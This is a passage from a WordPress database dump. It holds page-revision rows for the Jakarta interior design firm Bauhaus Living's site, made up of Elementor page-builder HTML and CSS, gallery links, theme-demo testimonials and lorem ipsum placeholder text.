.3s}.elementor-gallery-title--active{color:#495157}.elementor-gallery-title:not(:last-child){margin-right:var(--space-between)}.elementor-gallery-item__title+.elementor-gallery-item__description{margin-top:var(--description-margin-top)}.e-gallery-item.elementor-gallery-item{-webkit-transition-property:all;-o-transition-property:all;transition-property:all}.e-gallery-item.elementor-animated-content .elementor-animated-item--enter-from-bottom,.e-gallery-item.elementor-animated-content .elementor-animated-item--enter-from-left,.e-gallery-item.elementor-animated-content .elementor-animated-item--enter-from-right,.e-gallery-item.elementor-animated-content .elementor-animated-item--enter-from-top,.e-gallery-item:hover .elementor-gallery__item-overlay-bg,.e-gallery-item:hover .elementor-gallery__item-overlay-content,.e-gallery-item:hover .elementor-gallery__item-overlay-content__description,.e-gallery-item:hover .elementor-gallery__item-overlay-content__title{opacity:1}a.elementor-item.elementor-gallery-title{color:var(--galleries-title-color-normal)}a.elementor-item.elementor-gallery-title.elementor-item-active,a.elementor-item.elementor-gallery-title.highlighted,a.elementor-item.elementor-gallery-title:focus,a.elementor-item.elementor-gallery-title:hover{color:var(--galleries-title-color-hover)}a.elementor-item.elementor-gallery-title.elementor-item-active{color:var(--gallery-title-color-active)}.e-con-inner>.elementor-widget-gallery,.e-con>.elementor-widget-gallery{width:var(--container-widget-width,100%)}</style>		\n							<a href=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/Office-1.jpg\" data-elementor-open-lightbox=\"yes\" data-elementor-lightbox-slideshow=\"all-00d9390\" data-elementor-lightbox-title=\"Office-1\" e-action-hash=\"#elementor-action%3Aaction%3Dlightbox%26settings%3DeyJpZCI6NDgwMCwidXJsIjoiaHR0cHM6XC9cL2JhdWhhdXMuZnV0dXJlbWVkaWF0cml4LmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAyM1wvMDVcL09mZmljZS0xLmpwZyIsInNsaWRlc2hvdyI6ImFsbC0wMGQ5MzkwIn0%3D\">\n														</a>\n							<a href=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/office-2.jpg\" data-elementor-open-lightbox=\"yes\" data-elementor-lightbox-slideshow=\"all-00d9390\" data-elementor-lightbox-title=\"office-2\" e-action-hash=\"#elementor-action%3Aaction%3Dlightbox%26settings%3DeyJpZCI6NDgwMSwidXJsIjoiaHR0cHM6XC9cL2JhdWhhdXMuZnV0dXJlbWVkaWF0cml4LmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAyM1wvMDVcL29mZmljZS0yLmpwZyIsInNsaWRlc2hvdyI6ImFsbC0wMGQ5MzkwIn0%3D\">\n														</a>\n							<a href=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/office-3.jpg\" data-elementor-open-lightbox=\"yes\" data-elementor-lightbox-slideshow=\"all-00d9390\" data-elementor-lightbox-title=\"office-3\" e-action-hash=\"#elementor-action%3Aaction%3Dlightbox%26settings%3DeyJpZCI6NDgwMywidXJsIjoiaHR0cHM6XC9cL2JhdWhhdXMuZnV0dXJlbWVkaWF0cml4LmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAyM1wvMDVcL29mZmljZS0zLmpwZyIsInNsaWRlc2hvdyI6ImFsbC0wMGQ5MzkwIn0%3D\">\n														</a>\n							<a href=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/office-4.jpg\" data-elementor-open-lightbox=\"yes\" data-elementor-lightbox-slideshow=\"all-00d9390\" data-elementor-lightbox-title=\"office-4\" e-action-hash=\"#elementor-action%3Aaction%3Dlightbox%26settings%3DeyJpZCI6NDgwNCwidXJsIjoiaHR0cHM6XC9cL2JhdWhhdXMuZnV0dXJlbWVkaWF0cml4LmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAyM1wvMDVcL29mZmljZS00LmpwZyIsInNsaWRlc2hvdyI6ImFsbC0wMGQ5MzkwIn0%3D\">\n														</a>\n							<a href=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/office-5.jpg\" data-elementor-open-lightbox=\"yes\" data-elementor-lightbox-slideshow=\"all-00d9390\" data-elementor-lightbox-title=\"office-5\" e-action-hash=\"#elementor-action%3Aaction%3Dlightbox%26settings%3DeyJpZCI6NDgwNSwidXJsIjoiaHR0cHM6XC9cL2JhdWhhdXMuZnV0dXJlbWVkaWF0cml4LmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAyM1wvMDVcL29mZmljZS01LmpwZyIsInNsaWRlc2hvdyI6ImFsbC0wMGQ5MzkwIn0%3D\">\n														</a>\n							<a href=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/office-6.jpg\" data-elementor-open-lightbox=\"yes\" data-elementor-lightbox-slideshow=\"all-00d9390\" data-elementor-lightbox-title=\"office-6\" e-action-hash=\"#elementor-action%3Aaction%3Dlightbox%26settings%3DeyJpZCI6NDgwNiwidXJsIjoiaHR0cHM6XC9cL2JhdWhhdXMuZnV0dXJlbWVkaWF0cml4LmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAyM1wvMDVcL29mZmljZS02LmpwZyIsInNsaWRlc2hvdyI6ImFsbC0wMGQ5MzkwIn0%3D\">\n														</a>\n							<a href=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/office-7.jpg\" data-elementor-open-lightbox=\"yes\" data-elementor-lightbox-slideshow=\"all-00d9390\" data-elementor-lightbox-title=\"office-7\" e-action-hash=\"#elementor-action%3Aaction%3Dlightbox%26settings%3DeyJpZCI6NDgwNywidXJsIjoiaHR0cHM6XC9cL2JhdWhhdXMuZnV0dXJlbWVkaWF0cml4LmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAyM1wvMDVcL29mZmljZS03LmpwZyIsInNsaWRlc2hvdyI6ImFsbC0wMGQ5MzkwIn0%3D\">\n														</a>\n							<a href=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/office-8.jpeg\" data-elementor-open-lightbox=\"yes\" data-elementor-lightbox-slideshow=\"all-00d9390\" data-elementor-lightbox-title=\"office-8\" e-action-hash=\"#elementor-action%3Aaction%3Dlightbox%26settings%3DeyJpZCI6NDgwOCwidXJsIjoiaHR0cHM6XC9cL2JhdWhhdXMuZnV0dXJlbWVkaWF0cml4LmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAyM1wvMDVcL29mZmljZS04LmpwZWciLCJzbGlkZXNob3ciOiJhbGwtMDBkOTM5MCJ9\">\n														</a>','Office','','inherit','closed','closed','','4759-revision-v1','','','2023-09-22 08:39:17','2023-09-22 08:39:17','',4759,'https://bauhaus.futuremediatrix.com/?p=4863',0,'revision','',0),(4865,3,'2023-09-22 08:49:19','2023-09-22 08:49:19','[rev_slider alias=\"home-1\" slidertitle=\"Home 1\"][/rev_slider]		\n					<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/decor-home-1-about-interior.jpg\" alt=\"\">\n					<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-2927c-scaled.jpg\" alt=\"\">\n					<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-1065.jpg\" alt=\"\">\n					<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-2927.jpg\" alt=\"\">\n					<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-9402.jpg\" alt=\"\">\n							<h3>ABOUT US</h3>\n														<h2>\n								LOREM IPSUM							</h2>\n		<p>LOREM IPSUM</p><p>Bauhaus Living is Jakarta based interior design consultant &amp; contractor established on 2005. We provide a full range of services of interior design: interior design concept, 3D image, technical drawing and production. </p>		\n			<a href=\"https://bauhaus.futuremediatrix.com/about/\" role=\"button\">\n						More\n					</a>\n							<h3>SERVICES WE DO</h3>\n														<h2>\nOur highlighted services\nfor interior design							</h2>\n		Duis mollis varius quam sed congue. Aliquam porttitor  ultricies porttitor elementum. Nullam pretium id massa ut placerat. Class aptent taciti sociosqu ad litora.		\n		<a href=\"https://bauhaus.futuremediatrix.com/service/residential/\"  title=\"Residential\">\n	        				<h4>\n					Residential				</h4>\n		</a>\n					<p>\n				Nunc eleifend eget nunc eget consequat. Etiam sed varius est. Proin et lacus odio.			</p>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/residential/\"  title=\"Residential\">\n		</a>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/commercial/\"  title=\"Commercial\">\n	        				<h4>\n					Commercial				</h4>\n		</a>\n					<p>\n				Nunc eleifend eget nunc eget consequat. Etiam sed varius est. Proin et lacus odio.			</p>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/commercial/\"  title=\"Commercial\">\n		</a>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/office/\"  title=\"Office\">\n	        				<h4>\n					Office				</h4>\n		</a>\n					<p>\n				Nunc eleifend eget nunc eget consequat. Etiam sed varius est. Proin et lacus odio.			</p>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/office/\"  title=\"Office\">\n		</a>\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-con{--container-widget-width:100%}.e-con-inner>.elementor-widget-spacer,.e-con>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-con-inner>.elementor-widget-spacer>.elementor-widget-container,.e-con-inner>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer,.e-con>.elementor-widget-spacer>.elementor-widget-container,.e-con>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-con-inner>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner,.e-con>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n							<h3>our recent work</h3>\n														<h2>\n								Introducing outstanding new projects							</h2>\n        <!--  -->\n                    <ul>\n                <li data-filter=\"*\">\n                    All                </li>\n                                <li data-slug=\"2022\">\n                    2022                </li>\n                                <li data-slug=\"2021\">\n                    2021                </li>\n                                <li data-slug=\"2020\">\n                    2020                </li>\n                                <li data-slug=\"2019\">\n                    2019                </li>\n                                <li data-slug=\"2018\">\n                    2018                </li>\n            </ul>    \n            <svg width=\"50\" height=\"50\">\n                <circle cx=\"25\" cy=\"25\" r=\"10\" />\n                <circle cx=\"25\" cy=\"25\" r=\"20\" />\n            </svg>\n           <h4>no data</h4>\n							<h3>our benefits</h3>\n														<h2>\n								Why choose ?							</h2>\n							<p> There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration in some form.\n </p>\n			<link rel=\"stylesheet\" href=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/css/widget-icon-list.min.css\">		<ul>\n							<li>\n										Architecture business solutions\n									</li>\n								<li>\n										Top quality services with reasonable price\n									</li>\n								<li>\n										Reliable & experienced architecture & designers\n									</li>\n						</ul>\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-widget-progress{text-align:left}.elementor-progress-wrapper{position:relative;background-color:#eee;color:#fff;height:100%;border-radius:2px}.elementor-progress-bar{display:-webkit-box;display:-ms-flexbox;display:flex;background-color:#818a91;width:0;font-size:11px;height:30px;line-height:30px;border-radius:2px;-webkit-transition:width 1s ease-in-out;-o-transition:width 1s ease-in-out;transition:width 1s ease-in-out}.elementor-progress-text{-webkit-box-flex:1;-ms-flex-positive:1;flex-grow:1;white-space:nowrap;-o-text-overflow:ellipsis;text-overflow:ellipsis;overflow:hidden;padding-left:15px}.elementor-progress-percentage{padding-right:15px}.elementor-widget-progress .elementor-progress-wrapper.progress-info .elementor-progress-bar{background-color:#5bc0de}.elementor-widget-progress .elementor-progress-wrapper.progress-success .elementor-progress-bar{background-color:#5cb85c}.elementor-widget-progress .elementor-progress-wrapper.progress-warning .elementor-progress-bar{background-color:#f0ad4e}.elementor-widget-progress .elementor-progress-wrapper.progress-danger .elementor-progress-bar{background-color:#d9534f}.elementor-progress .elementor-title{display:block}@media (max-width:767px){.elementor-progress-text{padding-left:10px}}.e-con-inner .elementor-progress-wrapper,.e-con .elementor-progress-wrapper{height:auto}</style>			\n				Archirecture\n									80%\n				Designing\n									60%\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"2560\" height=\"1920\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-scaled.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-scaled.jpg 2560w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-300x225.jpg 300w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-1024x768.jpg 1024w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-768x576.jpg 768w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-1536x1152.jpg 1536w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-2048x1536.jpg 2048w\" sizes=\"(max-width: 2560px) 100vw, 2560px\" />															\n							<h3>Real Testimonials</h3>\n														<h2>\n								What they’re talking\nabout retirio							</h2>\n			<section>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Kevin martin\" >\n																							<p>\n													Kevin martin												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/jessica.jpg\" alt=\"Jessica brown \" >\n																							<p>\n													Jessica brown 												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/mike-hardson.jpg\" alt=\"Mike hardson\" >\n																							<p>\n													Mike hardson												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Kevin martin\" >\n																							<p>\n													Kevin martin												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/mike-hardson.jpg\" alt=\"Mike hardson\" >\n																							<p>\n													Mike hardson												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Kevin martin\" >\n																							<p>\n													Kevin martin												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n			</section>\n							<h3>Our process</h3>\n														<h2>\n								4 easy work steps							</h2>\n					Design\nconcept \n					01\n					Design\nschematic \n					02\n					Design\ndevelopment\n					03\n					Construction\ndevelopment\n					04\n															<img width=\"95\" height=\"110\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/01-test.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"96\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/02-home1.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"88\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/03-home1.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"107\" height=\"108\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04-home1.png\" alt=\"\" loading=\"lazy\" srcset=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04-home1.png 107w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04-home1-100x100.png 100w\" sizes=\"(max-width: 107px) 100vw, 107px\" />															\n															<img width=\"105\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/05-home1.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"106\" height=\"108\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/06-home1.png\" alt=\"\" loading=\"lazy\" />															\n							<h3>Direct from the blog posts</h3>\n														<h2>\nCheckout our latest news\nand articles							</h2>\n					<ul>\n							<li>\n						    							<a href=\"https://bauhaus.futuremediatrix.com/2022/11/14/hello-world/\" rel=\"bookmark\" title=\"Hello world!\">\n								<img src=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/images/placeholder.png\" alt=\" Hello world!\">\n							</a>\n									14\n									November\n										<a href=\"https://bauhaus.futuremediatrix.com/2022/11/14/hello-world/#comments\"> 1 Comment</a>              \n						<h2>\n							<a href=\"https://bauhaus.futuremediatrix.com/2022/11/14/hello-world/\" rel=\"bookmark\" title=\"Hello world!\">\n								Hello world!							</a>\n						</h2>\n				</li>	\n							<li>\n						    							<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/what-is-the-future-of-interior-design/\" rel=\"bookmark\" title=\"What is the future of interior design?\">\n								<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/blog-5.jpg\" alt=\" What is the future of interior design?\">\n							</a>\n									23\n									June\n										<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/what-is-the-future-of-interior-design/#respond\"> 0 Comment</a>              \n						<h2>\n							<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/what-is-the-future-of-interior-design/\" rel=\"bookmark\" title=\"What is the future of interior design?\">\n								What is the future of interior design?							</a>\n						</h2>\n				</li>	\n							<li>\n						    							<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/do-you-need-math-for-architecture/\" rel=\"bookmark\" title=\"Do you need math for architecture?\">\n								<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/blog-02.jpg\" alt=\" Do you need math for architecture?\">\n							</a>\n									23\n									June\n										<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/do-you-need-math-for-architecture/#comments\"> 1 Comment</a>              \n						<h2>\n							<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/do-you-need-math-for-architecture/\" rel=\"bookmark\" title=\"Do you need math for architecture?\">\n								Do you need math for architecture?							</a>\n						</h2>\n				</li>	\n					</ul>\n							<h3>Hire us for your new projects</h3>\n														<h2>\n								Get interior designs right now							</h2>\n			<a href=\"https://demo.ovatheme.com/retirio/contact/\" role=\"button\">\n						contact with us\n					</a>\n			<link rel=\"stylesheet\" href=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/css/widget-icon-box.min.css\">		\n				<h3>\n						This is the heading					\n				</h3>\n									<p>\n						Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.					</p>','Home 1','','inherit','closed','closed','','22-revision-v1','','','2023-09-22 08:49:19','2023-09-22 08:49:19','',22,'https://bauhaus.futuremediatrix.com/?p=4865',0,'revision','',0),(4866,3,'2023-09-22 08:49:19','2023-09-22 08:49:19','[rev_slider alias=\"home-1\" slidertitle=\"Home 1\"][/rev_slider]		\n					<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/decor-home-1-about-interior.jpg\" alt=\"\">\n					<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-2927c-scaled.jpg\" alt=\"\">\n					<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-1065.jpg\" alt=\"\">\n					<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-2927.jpg\" alt=\"\">\n					<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-9402.jpg\" alt=\"\">\n							<h3>ABOUT US</h3>\n														<h2>\n								LOREM IPSUM							</h2>\n		<p>LOREM IPSUM</p><p>Bauhaus Living is Jakarta based interior design consultant &amp; contractor established on 2005. We provide a full range of services of interior design: interior design concept, 3D image, technical drawing and production. </p>		\n			<a href=\"https://bauhaus.futuremediatrix.com/about/\" role=\"button\">\n						More\n					</a>\n							<h3>SERVICES WE DO</h3>\n														<h2>\nOur highlighted services\nfor interior design							</h2>\n		Duis mollis varius quam sed congue. Aliquam porttitor  ultricies porttitor elementum. Nullam pretium id massa ut placerat. Class aptent taciti sociosqu ad litora.		\n		<a href=\"https://bauhaus.futuremediatrix.com/service/residential/\"  title=\"Residential\">\n	        				<h4>\n					Residential				</h4>\n		</a>\n					<p>\n				Nunc eleifend eget nunc eget consequat. Etiam sed varius est. Proin et lacus odio.			</p>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/residential/\"  title=\"Residential\">\n		</a>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/commercial/\"  title=\"Commercial\">\n	        				<h4>\n					Commercial				</h4>\n		</a>\n					<p>\n				Nunc eleifend eget nunc eget consequat. Etiam sed varius est. Proin et lacus odio.			</p>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/commercial/\"  title=\"Commercial\">\n		</a>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/office/\"  title=\"Office\">\n	        				<h4>\n					Office				</h4>\n		</a>\n					<p>\n				Nunc eleifend eget nunc eget consequat. Etiam sed varius est. Proin et lacus odio.			</p>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/office/\"  title=\"Office\">\n		</a>\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-con{--container-widget-width:100%}.e-con-inner>.elementor-widget-spacer,.e-con>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-con-inner>.elementor-widget-spacer>.elementor-widget-container,.e-con-inner>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer,.e-con>.elementor-widget-spacer>.elementor-widget-container,.e-con>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-con-inner>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner,.e-con>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n							<h3>our recent work</h3>\n														<h2>\n								Introducing outstanding new projects							</h2>\n        <!--  -->\n                    <ul>\n                <li data-filter=\"*\">\n                    All                </li>\n                                <li data-slug=\"2022\">\n                    2022                </li>\n                                <li data-slug=\"2021\">\n                    2021                </li>\n                                <li data-slug=\"2020\">\n                    2020                </li>\n                                <li data-slug=\"2019\">\n                    2019                </li>\n                                <li data-slug=\"2018\">\n                    2018                </li>\n            </ul>    \n            <svg width=\"50\" height=\"50\">\n                <circle cx=\"25\" cy=\"25\" r=\"10\" />\n                <circle cx=\"25\" cy=\"25\" r=\"20\" />\n            </svg>\n           <h4>no data</h4>\n							<h3>our benefits</h3>\n														<h2>\n								Why choose ?							</h2>\n							<p> There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration in some form.\n </p>\n			<link rel=\"stylesheet\" href=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/css/widget-icon-list.min.css\">		<ul>\n							<li>\n										Architecture business solutions\n									</li>\n								<li>\n										Top quality services with reasonable price\n									</li>\n								<li>\n										Reliable & experienced architecture & designers\n									</li>\n						</ul>\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-widget-progress{text-align:left}.elementor-progress-wrapper{position:relative;background-color:#eee;color:#fff;height:100%;border-radius:2px}.elementor-progress-bar{display:-webkit-box;display:-ms-flexbox;display:flex;background-color:#818a91;width:0;font-size:11px;height:30px;line-height:30px;border-radius:2px;-webkit-transition:width 1s ease-in-out;-o-transition:width 1s ease-in-out;transition:width 1s ease-in-out}.elementor-progress-text{-webkit-box-flex:1;-ms-flex-positive:1;flex-grow:1;white-space:nowrap;-o-text-overflow:ellipsis;text-overflow:ellipsis;overflow:hidden;padding-left:15px}.elementor-progress-percentage{padding-right:15px}.elementor-widget-progress .elementor-progress-wrapper.progress-info .elementor-progress-bar{background-color:#5bc0de}.elementor-widget-progress .elementor-progress-wrapper.progress-success .elementor-progress-bar{background-color:#5cb85c}.elementor-widget-progress .elementor-progress-wrapper.progress-warning .elementor-progress-bar{background-color:#f0ad4e}.elementor-widget-progress .elementor-progress-wrapper.progress-danger .elementor-progress-bar{background-color:#d9534f}.elementor-progress .elementor-title{display:block}@media (max-width:767px){.elementor-progress-text{padding-left:10px}}.e-con-inner .elementor-progress-wrapper,.e-con .elementor-progress-wrapper{height:auto}</style>			\n				Archirecture\n									80%\n				Designing\n									60%\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"2560\" height=\"1920\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-scaled.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-scaled.jpg 2560w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-300x225.jpg 300w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-1024x768.jpg 1024w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-768x576.jpg 768w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-1536x1152.jpg 1536w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-2048x1536.jpg 2048w\" sizes=\"(max-width: 2560px) 100vw, 2560px\" />															\n							<h3>Real Testimonials</h3>\n														<h2>\n								What they’re talking\nabout retirio							</h2>\n			<section>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Kevin martin\" >\n																							<p>\n													Kevin martin												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/jessica.jpg\" alt=\"Jessica brown \" >\n																							<p>\n													Jessica brown 												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/mike-hardson.jpg\" alt=\"Mike hardson\" >\n																							<p>\n													Mike hardson												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Kevin martin\" >\n																							<p>\n													Kevin martin												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img 